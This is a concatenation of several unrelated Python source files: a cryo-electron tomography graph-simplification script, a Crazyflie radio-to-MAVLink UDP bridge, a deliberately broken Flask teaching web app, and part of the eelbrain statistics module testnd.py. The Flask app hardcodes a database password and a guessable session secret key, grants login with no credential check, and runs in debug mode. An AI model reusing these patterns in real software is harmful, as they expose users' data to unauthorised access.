mask = sp.ndimage.morphology.binary_dilation(mask, iterations=DILATE_NITER)
for v in graph.get_vertices_list():
x, y, z = graph.get_vertex_coords(v)
if not mask[int(round(x)), int(round(y)), int(round(z))]:
graph.remove_vertex(v)
print('\tP[' + str(pr_id) + '] Building geometry...')
graph.build_vertex_geometry()
if do_clahe:
print('\tP[' + str(pr_id) + '] CLAHE on field_value_inv property...')
graph.compute_edges_length(ps.globals.SGT_EDGE_LENGTH, 1, 1, 1, False)
graph.clahe_field_value(max_geo_dist=50, N=256, clip_f=100., s_max=4.)
print('\tP[' + str(pr_id) + '] Computing vertices and edges properties...')
graph.compute_vertices_dst()
graph.compute_edge_filamentness()
graph.add_prop_inv(prop_topo, edg=True)
graph.compute_edge_affinity()
print('\tP[' + str(pr_id) + '] Applying general thresholds...')
if ang_rot is not None:
print('\tDeleting edges in MW area...')
graph.filter_mw_edges(ang_rot, ang_tilt)
print('\tP[' + str(pr_id) + '] Computing graph global statistics (before simplification)...')
nvv, nev, nepv = graph.compute_global_stat(mask=mask_den)
print('\t\t-P[' + str(pr_id) + '] Vertex density: ' + str(round(nvv, 5)) + ' nm^3')
print('\t\t-P[' + str(pr_id) + '] Edge density: ' + str(round(nev, 5)) + ' nm^3')
print('\t\t-P[' + str(pr_id) + '] Edge/Vertex ratio: ' + str(round(nepv, 5)))
print('\tP[' + str(pr_id) + '] Graph density simplification for vertices...')
if prop_topo != ps.globals.STR_FIELD_VALUE:
print('\t\tProperty used: ' + prop_topo)
graph.set_pair_prop(prop_topo)
try:
graph.graph_density_simp_ref(mask=np.asarray(mask_den, dtype=int), v_den=v_den,
v_prop=v_prop, v_mode=v_mode)
except ps.pexceptions.PySegInputWarning as e:
print('P[' + str(pr_id) + '] WARNING: graph density simplification failed:')
print('\t-' + e.get_message())
print('\tGraph density simplification for edges in membrane 1...')
mask_pst = (seg == MB_LBL_1) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_pst)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_pst, dtype=int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(ve_ratio) + ' could not be achieved (current is ' + str(nepv) + ')')
print('\tGraph density simplification for edges in the membrane 2...')
mask_pre = (seg == MB_LBL_2) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_pre)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_pre, dtype=int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(ve_ratio) + ' could not be achieved (current is ' + str(nepv) + ')')
print('\tGraph density simplification for edges in the exterior 1...')
mask_psd = (seg == EXT_LBL_1) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_psd)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_psd, dtype=int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(ve_ratio) + ' could not be achieved (current is ' + str(nepv) + ')')
print('\tGraph density simplification for edges in the exterior 2...')
mask_az = (seg == EXT_LBL_2) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_az)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_az, dtype=int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(ve_ratio) + ' could not be achieved (current is ' + str(nepv) + ')')
print('\tGraph density simplification for edges in the gap...')
mask_clf = (seg == GAP_LBL) & mask
nvv, nev, nepv = graph.compute_global_stat(mask=mask_clf)
if nepv > ve_ratio:
e_den = nvv * ve_ratio
hold_e_prop = e_prop
graph.graph_density_simp_ref(mask=np.asarray(mask_clf, dtype=int), e_den=e_den,
e_prop=hold_e_prop, e_mode=e_mode, fit=True)
else:
print('\tWARNING: demanded ratio ' + str(ve_ratio) + ' could not be achieved (current is ' + str(nepv) + ')')
print('\tComputing graph global statistics (after simplification)...')
nvv, _, _ = graph.compute_global_stat(mask=mask_den)
_, nev_pst, nepv_pst = graph.compute_global_stat(mask=mask_pst)
_, nev_pre, nepv_pre = graph.compute_global_stat(mask=mask_pre)
_, nev_psd, nepv_psd = graph.compute_global_stat(mask=mask_psd)
_, nev_az, nepv_az = graph.compute_global_stat(mask=mask_az)
_, nev_clf, nepv_clf = graph.compute_global_stat(mask=mask_clf)
print('\t\t-Vertex density (membranes): ' + str(round(nvv, 5)) + ' nm^3')
print('\t\t-Edge density (MB1):' + str(round(nev_pst, 5)) + ' nm^3')
print('\t\t-Edge density (MB2):' + str(round(nev_pre, 5)) + ' nm^3')
print('\t\t-Edge density (EXT1):' + str(round(nev_psd, 5)) + ' nm^3')
print('\t\t-Edge density (EXT2):' + str(round(nev_az, 5)) + ' nm^3')
print('\t\t-Edge density (GAP):' + str(round(nev_clf, 5)) + ' nm^3')
print('\t\t-Edge/Vertex ratio (MB1): ' + str(round(nepv_pst, 5)))
print('\t\t-Edge/Vertex ratio (MB2): ' + str(round(nepv_pre, 5)))
print('\t\t-Edge/Vertex ratio (EXT1): ' + str(round(nepv_psd, 5)))
print('\t\t-Edge/Vertex ratio (EXT2): ' + str(round(nepv_az, 5)))
print('\t\t-Edge/Vertex ratio (GAP): ' + str(round(nepv_clf, 5)))
print('\tComputing graph properties (2)...')
graph.compute_mb_geo()
graph.compute_mb_eu_dst()
graph.compute_edge_curvatures()
# graph.compute_edges_length(ps.globals.SGT_EDGE_LENGTH, 1, 1, 1, False)
graph.compute_vertices_dst()
graph.compute_edge_filamentness()
graph.compute_edge_affinity()
print('\tSaving intermediate graphs...')
ps.disperse_io.save_vtp(graph.get_vtp(av_mode=True, edges=True),
output_dir + '/' + stem + '_edges.vtp')
ps.disperse_io.save_vtp(graph.get_vtp(av_mode=False, edges=True),
output_dir + '/' + stem + '_edges_2.vtp')
# ps.disperse_io.save_vtp(graph.get_scheme_vtp(nodes=True, edges=True),
# output_dir + '/' + stem + '_sch.vtp')
out_pkl = output_dir + '/' + stem_pkl + '.pkl'
print('\tP[' + str(pr_id) + '] Pickling the graph as: ' + out_pkl)
graph.pickle(out_pkl)
# star.set_element('_psGhMCFPickle', row, out_pkl)
q_pkls.put((row, out_pkl))
pkls_dic[row] = out_pkl
sys.exit(pr_id)
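# Note: each worker terminates via sys.exit(pr_id), so the join loop below can
# compare pr.exitcode against pr_id to detect workers that ended abnormally.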
# Loop for processing the input data
print('Running main loop in parallel: ')
q_pkls = mp.Queue()
processes, pr_results = dict(), dict()
spl_ids = np.array_split(list(range(star.get_nrows())), npr)
for pr_id in range(npr):
pr = mp.Process(target=pr_worker, args=(pr_id, spl_ids[pr_id], q_pkls))
pr.start()
processes[pr_id] = pr
for pr_id, pr in zip(iter(processes.keys()), iter(processes.values())):
pr.join()
if pr_id != pr.exitcode:
print('ERROR: the process ' + str(pr_id) + ' ended unsuccessfully [' + str(pr.exitcode) + ']')
print('Unsuccessfully terminated. (' + time.strftime("%c") + ')')
count, n_rows = 0, star.get_nrows()
while count < n_rows:
hold_out_pkl = q_pkls.get()
star.set_element(key='_psGhMCFPickle', row=hold_out_pkl[0], val=hold_out_pkl[1])
count += 1
out_star = output_dir + '/' + os.path.splitext(os.path.split(in_star)[1])[0] + '_mb_graph.star'
print('\tStoring output STAR file in: ' + out_star)
star.store(out_star)
print('Terminated. (' + time.strftime("%c") + ')')
|
cfbridge.py
|
#!/usr/bin/env python
"""
Bridge a Crazyflie connected to a Crazyradio to a local MAVLink port
Requires 'pip install cflib'
The ESB protocol works using PTX and PRX (Primary Transmitter/Receiver) modes;
data is only received as a response to a sent packet.
So, we need to constantly poll the receivers for bidirectional communication.
@author: Dennis Shtatnov (densht@gmail.com)
Based off example code from crazyflie-lib-python/examples/read-eeprom.py
"""
# import struct
import logging
import socket
import sys
import threading
import time
import cflib.crtp
from cflib.crazyflie import Crazyflie
from cflib.crtp.crtpstack import CRTPPacket
# from cflib.crtp.crtpstack import CRTPPort
CRTP_PORT_MAVLINK = 8
# Output debug information from the logging framework
logging.basicConfig(level=logging.DEBUG)
class RadioBridge:
def __init__(self, link_uri):
""" Initialize and run the example with the specified link_uri """
# UDP socket for interfacing with GCS
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.bind(('127.0.0.1', 14551))
# Create a Crazyflie object without specifying any cache dirs
self._cf = Crazyflie()
# Connect some callbacks from the Crazyflie API
self._cf.connected.add_callback(self._connected)
self._cf.disconnected.add_callback(self._disconnected)
self._cf.connection_failed.add_callback(self._connection_failed)
self._cf.connection_lost.add_callback(self._connection_lost)
print('Connecting to %s' % link_uri)
# Try to connect to the Crazyflie
self._cf.open_link(link_uri)
# Variable used to keep main loop occupied until disconnect
self.is_connected = True
threading.Thread(target=self._server).start()
def _connected(self, link_uri):
""" This callback is called form the Crazyflie API when a Crazyflie
has been connected and the TOCs have been downloaded."""
print('Connected to %s' % link_uri)
self._cf.packet_received.add_callback(self._got_packet)
def _got_packet(self, pk):
if pk.port == CRTP_PORT_MAVLINK:
self._sock.sendto(pk.data, ('127.0.0.1', 14550))
def _forward(self, data):
pk = CRTPPacket()
pk.port = CRTP_PORT_MAVLINK # CRTPPort.COMMANDER
pk.data = data # struct.pack('<fffH', roll, -pitch, yaw, thrust)
self._cf.send_packet(pk)
def _server(self):
while True:
print('\nwaiting to receive message')
# Only receive what can be sent in one message
data, address = self._sock.recvfrom(256)
print('received %s bytes from %s' % (len(data), address))
for i in range(0, len(data), 30):
self._forward(data[i:(i+30)])
def _stab_log_error(self, logconf, msg):
"""Callback from the log API when an error occurs"""
print('Error when logging %s: %s' % (logconf.name, msg))
def _stab_log_data(self, timestamp, data, logconf):
"""Callback froma the log API when data arrives"""
print('[%d][%s]: %s' % (timestamp, logconf.name, data))
def _connection_failed(self, link_uri, msg):
"""Callback when connection initial connection fails (i.e no Crazyflie
at the speficied address)"""
print('Connection to %s failed: %s' % (link_uri, msg))
self.is_connected = False
def _connection_lost(self, link_uri, msg):
"""Callback when disconnected after a connection has been made (i.e
Crazyflie moves out of range)"""
print('Connection to %s lost: %s' % (link_uri, msg))
def _disconnected(self, link_uri):
"""Callback when the Crazyflie is disconnected (called in all cases)"""
print('Disconnected from %s' % link_uri)
self.is_connected = False
if __name__ == '__main__':
# Initialize the low-level drivers (don't list the debug drivers)
cflib.crtp.radiodriver.set_retries_before_disconnect(1500)
cflib.crtp.radiodriver.set_retries(3)
cflib.crtp.init_drivers(enable_debug_driver=False)
# Scan for Crazyflies and use the first one found
print('Scanning interfaces for Crazyflies...')
if len(sys.argv) > 2:
address = int(sys.argv[2], 16) # address=0xE7E7E7E7E7
else:
address = None
available = cflib.crtp.scan_interfaces(address)
print('Crazyflies found:')
for i in available:
print(i[0])
if len(available) > 0:
if len(sys.argv) > 1:
channel = str(sys.argv[1])
else:
channel = 80
link_uri = 'radio://0/' + str(channel) + '/2M'
le = RadioBridge(link_uri) # (available[0][0])
# The Crazyflie lib doesn't contain anything to keep the application alive,
# so this is where your application should do something. In our case we
# are just waiting until we are disconnected.
try:
while le.is_connected:
time.sleep(1)
except KeyboardInterrupt:
sys.exit(1)
|
vsearch4web.not.slow.with.threads.but.broken.py
|
from flask import Flask, render_template, request, escape, session
from vsearch import search4letters
from DBcm import UseDatabase, ConnectionError, CredentialsError, SQLError
from checker import check_logged_in
from threading import Thread
from time import sleep
app = Flask(__name__)
app.config['dbconfig'] = {'host': '127.0.0.1',
'user': 'vsearch',
'password': 'vsearchpasswd',
'database': 'vsearchlogDB', }
@app.route('/login')
def do_login() -> str:
session['logged_in'] = True
return 'You are now logged in.'
@app.route('/logout')
def do_logout() -> str:
session.pop('logged_in')
return 'You are now logged out.'
def log_request(req: 'flask_request', res: str) -> None:
"""Log details of the web request and the results."""
# raise Exception("Something awful just happened.")
sleep(15) # This makes log_request really slow...
with UseDatabase(app.config['dbconfig']) as cursor:
_SQL = """insert into log
(phrase, letters, ip, browser_string, results)
values
(%s, %s, %s, %s, %s)"""
cursor.execute(_SQL, (req.form['phrase'],
req.form['letters'],
req.remote_addr,
req.user_agent.browser,
res, ))
@app.route('/search4', methods=['POST'])
def do_search() -> 'html':
"""Extract the posted data; perform the search; return results."""
phrase = request.form['phrase']
letters = request.form['letters']
title = 'Here are your results:'
results = str(search4letters(phrase, letters))
try:
t = Thread(target=log_request, args=(request, results))
t.start()
except Exception as err:
print('***** Logging failed with this error:', str(err))
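# NOTE (why this version is broken, as the filename suggests): Flask's request
# object is a context-local proxy, so when log_request later reads req.form in
# the worker thread, outside the request context, it raises a RuntimeError and
# the log insert never happens. A common fix is to copy the needed values (or
# push a request context) before handing the work to the thread.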
return render_template('results.html',
the_title=title,
the_phrase=phrase,
the_letters=letters,
the_results=results,)
@app.route('/')
@app.route('/entry')
def entry_page() -> 'html':
"""Display this webapp's HTML form."""
return render_template('entry.html',
the_title='Welcome to search4letters on the web!')
@app.route('/viewlog')
@check_logged_in
def view_the_log() -> 'html':
"""Display the contents of the log file as a HTML table."""
try:
with UseDatabase(app.config['dbconfig']) as cursor:
_SQL = """select phrase, letters, ip, browser_string, results
from log"""
cursor.execute(_SQL)
contents = cursor.fetchall()
# raise Exception("Some unknown exception.")
titles = ('Phrase', 'Letters', 'Remote_addr', 'User_agent', 'Results')
return render_template('viewlog.html',
the_title='View Log',
the_row_titles=titles,
the_data=contents,)
except ConnectionError as err:
print('Is your database switched on? Error:', str(err))
except CredentialsError as err:
print('User-id/Password issues. Error:', str(err))
except SQLError as err:
print('Is your query correct? Error:', str(err))
except Exception as err:
print('Something went wrong:', str(err))
return 'Error'
app.secret_key = 'YouWillNeverGuessMySecretKey'
if __name__ == '__main__':
app.run(debug=True)
|
testnd.py
|
'''Statistical tests for NDVars
Common Attributes
-----------------
The following attributes are always present. For ANOVA, they are lists with the
corresponding items for different effects.
t/f/... : NDVar
Map of the statistical parameter.
p_uncorrected : NDVar
Map of uncorrected p values.
p : NDVar | None
Map of corrected p values (None if no correction was applied).
clusters : Dataset | None
Table of all the clusters found (None if no clusters were found, or if no
clustering was performed).
n_samples : None | int
The actual number of permutations. If ``samples = -1``, i.e. a complete set
of permutations is performed, then ``n_samples`` indicates the actual
number of permutations that constitute the complete set.
'''
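# Minimal usage sketch (hypothetical names; assumes ``ds`` is an eelbrain
# Dataset containing an NDVar 'y' and a repeated-measures factor 'subject'):
#     res = ttest_1samp('y', match='subject', ds=ds, samples=1000, pmin=0.05)
#     res.p                   # corrected p-value map (None without permutations)
#     res.find_clusters(0.05) # table of clusters with p-values below 0.05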
from datetime import datetime, timedelta
from functools import reduce, partial
from itertools import chain, repeat
from math import ceil
from multiprocessing import Process, Event, SimpleQueue
from multiprocessing.sharedctypes import RawArray
import logging
import operator
import os
import re
import socket
from time import time as current_time
from typing import Union
import numpy as np
import scipy.stats
from scipy import ndimage
from tqdm import trange
from .. import fmtxt, _info, _text
from ..fmtxt import FMText
from .._celltable import Celltable
from .._config import CONFIG
from .._data_obj import (
CategorialArg, CellArg, IndexArg, ModelArg, NDVarArg, VarArg,
Dataset, Var, Factor, Interaction, NestedEffect,
NDVar, Categorial, UTS,
ascategorial, asmodel, asndvar, asvar, assub,
cellname, combine, dataobj_repr)
from .._exceptions import OldVersionError, WrongDimension, ZeroVariance
from .._utils import LazyProperty, user_activity, restore_main_spec
from .._utils.numpy_utils import FULL_AXIS_SLICE
from . import opt, stats, vector
from .connectivity import Connectivity, find_peaks
from .connectivity_opt import merge_labels, tfce_increment
from .glm import _nd_anova
from .permutation import (
_resample_params, permute_order, permute_sign_flip, random_seeds,
rand_rotation_matrices)
from .t_contrast import TContrastRel
from .test import star, star_factor, _independent_measures_args, _related_measures_args
__test__ = False
def check_for_vector_dim(y: NDVar) -> None:
for dim in y.dims:
if dim._connectivity_type == 'vector':
raise WrongDimension(f"{dim}: mass-univariate methods are not suitable for vectors. Consider using vector norm as test statistic, or using a testnd.Vector test function.")
def check_variance(x):
if x.ndim != 2:
x = x.reshape((len(x), -1))
if opt.has_zero_variance(x):
raise ZeroVariance("y contains data column with zero variance")
class NDTest:
"""Baseclass for testnd test results
Attributes
----------
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
"""
_state_common = ('y', 'match', 'sub', 'samples', 'tfce', 'pmin', '_cdist',
'tstart', 'tstop', '_dims')
_state_specific = ()
_statistic = None
_statistic_tail = 0
@property
def _attributes(self):
return self._state_common + self._state_specific
def __init__(self, y, match, sub, samples, tfce, pmin, cdist, tstart, tstop):
self.y = dataobj_repr(y)
self.match = dataobj_repr(match) if match else match
self.sub = sub
self.samples = samples
self.tfce = tfce
self.pmin = pmin
self._cdist = cdist
self.tstart = tstart
self.tstop = tstop
self._dims = y.dims[1:]
def __getstate__(self):
return {name: getattr(self, name, None) for name in self._attributes}
def __setstate__(self, state):
# backwards compatibility:
if 'Y' in state:
state['y'] = state.pop('Y')
if 'X' in state:
state['x'] = state.pop('X')
for k, v in state.items():
setattr(self, k, v)
# backwards compatibility:
if 'tstart' not in state:
cdist = self._first_cdist
self.tstart = cdist.tstart
self.tstop = cdist.tstop
if '_dims' not in state: # 0.17
if 't' in state:
self._dims = state['t'].dims
elif 'r' in state:
self._dims = state['r'].dims
elif 'f' in state:
self._dims = state['f'][0].dims
else:
raise RuntimeError("Error recovering old test results dims")
self._expand_state()
def __repr__(self):
args = self._repr_test_args()
if self.sub is not None:
if isinstance(self.sub, np.ndarray):
sub_repr = '<array>'
else:
sub_repr = repr(self.sub)
args.append(f'sub={sub_repr}')
if self._cdist:
args += self._repr_cdist()
else:
args.append('samples=0')
return f"<{self.__class__.__name__} {', '.join(args)}>"
def _repr_test_args(self):
"""List of strings describing parameters unique to the test
Will be joined with ``", ".join(repr_args)``
"""
raise NotImplementedError()
def _repr_cdist(self):
"""List of results (override for MultiEffectResult)"""
return (self._cdist._repr_test_args(self.pmin) +
self._cdist._repr_clusters())
def _expand_state(self):
"Override to create secondary results"
cdist = self._cdist
if cdist is None:
self.tfce_map = None
self.p = None
self._kind = None
else:
self.tfce_map = cdist.tfce_map
self.p = cdist.probability_map
self._kind = cdist.kind
def _desc_samples(self):
if self.samples == -1:
return f"a complete set of {self.n_samples} permutations"
elif self.samples is None:
return "no permutations"
else:
return f"{self.n_samples} random permutations"
def _desc_timewindow(self):
tstart = self._time_dim.tmin if self.tstart is None else self.tstart
tstop = self._time_dim.tstop if self.tstop is None else self.tstop
return f"{_text.ms(tstart)} - {_text.ms(tstop)} ms"
def _asfmtext(self):
p = self.p.min()
max_stat = self._max_statistic()
return FMText((fmtxt.eq(self._statistic, max_stat, 'max', stars=p), ', ', fmtxt.peq(p)))
def _default_plot_obj(self):
raise NotImplementedError
def _iter_cdists(self):
yield (None, self._cdist)
@property
def _first_cdist(self):
return self._cdist
def _plot_model(self):
"Determine x for plotting categories"
return None
def _plot_sub(self):
if isinstance(self.sub, str) and self.sub == "<unsaved array>":
raise RuntimeError("The sub parameter was not saved for previous "
"versions of Eelbrain. Please recompute this "
"result with the current version.")
return self.sub
def _assert_has_cdist(self):
if self._cdist is None:
raise RuntimeError("This method only applies to results of tests "
"with threshold-based clustering and tests with "
"a permutation distribution (samples > 0)")
def masked_parameter_map(self, pmin=0.05, **sub):
"""Create a copy of the parameter map masked by significance
Parameters
----------
pmin : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
Returns
-------
masked_map : NDVar
NDVar with data from the original parameter map wherever p <= pmin
and 0 everywhere else.
"""
self._assert_has_cdist()
return self._cdist.masked_parameter_map(pmin, **sub)
def cluster(self, cluster_id):
"""Retrieve a specific cluster as NDVar
Parameters
----------
cluster_id : int
Cluster id.
Returns
-------
cluster : NDVar
NDVar of the cluster, 0 outside the cluster.
Notes
-----
Clusters only have stable ids for thresholded cluster distributions.
"""
self._assert_has_cdist()
return self._cdist.cluster(cluster_id)
@LazyProperty
def clusters(self):
if self._cdist is None:
return None
else:
return self.find_clusters(None, True)
def find_clusters(self, pmin=None, maps=False, **sub):
"""Find significant regions or clusters
Parameters
----------
pmin : None | scalar, 1 >= p >= 0
Threshold p-value. For threshold-based tests, all clusters with a
p-value smaller than ``pmin`` are included (default 1);
for other tests, find contiguous regions with ``p ≤ pmin`` (default
0.05).
maps : bool
Include in the output a map of every cluster (can be memory
intensive if there are large statistical maps and/or many
clusters; default ``False``).
Returns
-------
ds : Dataset
Dataset with information about the clusters.
"""
self._assert_has_cdist()
return self._cdist.clusters(pmin, maps, **sub)
def find_peaks(self):
"""Find peaks in a threshold-free cluster distribution
Returns
-------
ds : Dataset
Dataset with information about the peaks.
"""
self._assert_has_cdist()
return self._cdist.find_peaks()
def compute_probability_map(self, **sub):
"""Compute a probability map
Returns
-------
probability : NDVar
Map of p-values.
"""
self._assert_has_cdist()
return self._cdist.compute_probability_map(**sub)
def info_list(self, computation=True):
"List with information about the test"
out = fmtxt.List("Mass-univariate statistics:")
out.add_item(self._name())
dimnames = [dim.name for dim in self._dims]
dimlist = out.add_sublist(f"Over {_text.enumeration(dimnames)}")
if 'time' in dimnames:
dimlist.add_item(f"Time interval: {self._desc_timewindow()}.")
cdist = self._first_cdist
if cdist is None:
out.add_item("No inferential statistics")
return out
# inference
l = out.add_sublist("Inference:")
if cdist.kind == 'raw':
l.add_item("Based on maximum statistic")
elif cdist.kind == 'tfce':
l.add_item("Based on maximum statistic with threshold-"
"free cluster enhancement (Smith & Nichols, 2009)")
elif cdist.kind == 'cluster':
l.add_item("Based on maximum cluster mass statistic")
sl = l.add_sublist("Cluster criteria:")
for dim in dimnames:
if dim == 'time':
sl.add_item(f"Minimum cluster duration {_text.ms(cdist.criteria.get('mintime', 0))} ms")
elif dim == 'source':
sl.add_item(f"At least {cdist.criteria.get('minsource', 0)} contiguous sources.")
elif dim == 'sensor':
sl.add_item(f"At least {cdist.criteria.get('minsensor', 0)} contiguous sensors.")
else:
value = cdist.criteria.get(f'min{dim}', 0)
sl.add_item(f"Minimum number of contiguous elements in {dim}: {value}")
# n samples
l.add_item(f"In {self._desc_samples()}")
# computation
if computation:
out.add_item(cdist.info_list())
return out
@property
def _statistic_map(self):
return getattr(self, self._statistic)
def _max_statistic(self):
tail = getattr(self, 'tail', self._statistic_tail)
return self._max_statistic_from_map(self._statistic_map, self.p, tail)
@staticmethod
def _max_statistic_from_map(stat_map: NDVar, p_map: NDVar, tail: int):
if tail == 0:
func = stat_map.extrema
elif tail == 1:
func = stat_map.max
else:
func = stat_map.min
if p_map:
mask = p_map <= .05 if p_map.min() <= .05 else None
else:
mask = None
return func() if mask is None else func(mask)
@property
def n_samples(self):
if self.samples == -1:
return self._first_cdist.samples
else:
return self.samples
@property
def _time_dim(self):
for dim in self._first_cdist.dims:
if isinstance(dim, UTS):
return dim
return None
class t_contrast_rel(NDTest):
"""Mass-univariate contrast based on t-values
Parameters
----------
y : NDVar
Dependent variable.
x : categorial
Model containing the cells which are compared with the contrast.
contrast : str
Contrast specification: see Notes.
match : Factor
Match cases for a repeated measures test.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use a t-value equivalent to an
uncorrected p-value for a related samples t-test (with df =
len(match.cells) - 1).
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Notes
-----
A contrast specifies the steps to calculate a map based on *t*-values.
Contrast definitions can contain:
- Comparisons using ``>`` or ``<`` and data cells to compute *t*-maps.
For example, ``"cell1 > cell0"`` will compute a *t*-map of the comparison
if ``cell1`` and ``cell0``, being positive where ``cell1`` is greater than
``cell0`` and negative where ``cell0`` is greater than ``cell1``.
If the data is defined based on an interaction, cells are specified with
``|``, e.g. ``"a1 | b1 > a0 | b0"``. Cells can contain ``*`` to average
multiple cells. Thus, if the second factor in the model has cells ``b1``
and ``b0``, ``"a1 | * > a0 | *"`` would compare ``a1`` to ``a0``
while averaging ``b1`` and ``b0`` within ``a1`` and ``a0``.
- Unary numpy functions ``abs`` and ``negative``, e.g.
``"abs(cell1 > cell0)"``.
- Binary numpy functions ``subtract`` and ``add``, e.g.
``"add(a>b, a>c)"``.
- Numpy functions for multiple arrays ``min``, ``max`` and ``sum``,
e.g. ``min(a>d, b>d, c>d)``.
Cases with zero variance are set to t=0.
Examples
--------
To find cluster where both of two pairwise comparisons are reliable,
i.e. an intersection of two effects, one could use
``"min(a > c, b > c)"``.
To find a specific kind of interaction, where a is greater than b, and
this difference is greater than the difference between c and d, one
could use ``"(a > b) - abs(c > d)"``.
"""
_state_specific = ('x', 'contrast', 't', 'tail')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
x: CategorialArg,
contrast: str,
match: CategorialArg = None,
sub: CategorialArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
if match is None:
raise TypeError("The `match` parameter needs to be specified for repeated measures test t_contrast_rel")
ct = Celltable(y, x, match, sub, ds=ds, coercion=asndvar, dtype=np.float64)
check_for_vector_dim(ct.y)
check_variance(ct.y.x)
# setup contrast
t_contrast = TContrastRel(contrast, ct.cells, ct.data_indexes)
# original data
tmap = t_contrast.map(ct.y.x)
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
df = len(ct.match.cells) - 1
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
cdist = NDPermutationDistribution(
ct.y, samples, threshold, tfce, tail, 't', "t-contrast",
tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_order(len(ct.y), samples, unit=ct.match)
run_permutation(t_contrast, cdist, iterator)
# NDVar map of t-values
info = _info.for_stat_map('t', threshold, tail=tail, old=ct.y.info)
t = NDVar(tmap, ct.y.dims[1:], info, 't')
# store attributes
NDTest.__init__(self, ct.y, ct.match, sub, samples, tfce, pmin, cdist,
tstart, tstop)
self.x = ('%'.join(ct.x.base_names) if isinstance(ct.x, Interaction) else
ct.x.name)
self.contrast = contrast
self.tail = tail
self.tmin = tmin
self.t = t
self._expand_state()
def _name(self):
if self.y:
return "T-Contrast: %s ~ %s" % (self.y, self.contrast)
else:
return "T-Contrast: %s" % self.contrast
def _plot_model(self):
return self.x
def _repr_test_args(self):
args = [repr(self.y), repr(self.x), repr(self.contrast)]
if self.tail:
args.append("tail=%r" % self.tail)
if self.match:
args.append('match=%r' % self.match)
return args
class corr(NDTest):
"""Mass-univariate correlation
Parameters
----------
y : NDVar
Dependent variable.
x : continuous
The continuous predictor variable.
norm : None | categorial
Categories in which to normalize (z-score) x.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use an r-value equivalent to an
uncorrected p-value.
rmin : None | scalar
Threshold for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
match : None | categorial
When permuting data, only shuffle the cases within the categories
of match.
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
r : NDVar
Map of correlation values (with threshold contours).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
"""
_state_specific = ('x', 'norm', 'n', 'df', 'r')
_statistic = 'r'
@user_activity
def __init__(
self,
y: NDVarArg,
x: VarArg,
norm: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
pmin: float = None,
rmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
match: CategorialArg = None,
parc: str = None,
